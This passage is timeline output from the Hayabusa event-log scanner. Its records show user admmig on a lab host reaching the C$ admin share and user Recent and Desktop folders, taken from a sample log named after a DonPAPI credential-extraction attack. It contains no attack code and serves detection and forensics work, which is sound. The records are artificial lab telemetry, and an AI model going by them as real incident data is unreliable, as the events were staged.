0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.643 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.658 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.674 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.689 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.705 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.721 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.736 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.752 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.768 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.783 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.799 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.814 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\Desktop | IP Addr: 10.23.123.11 | LID: 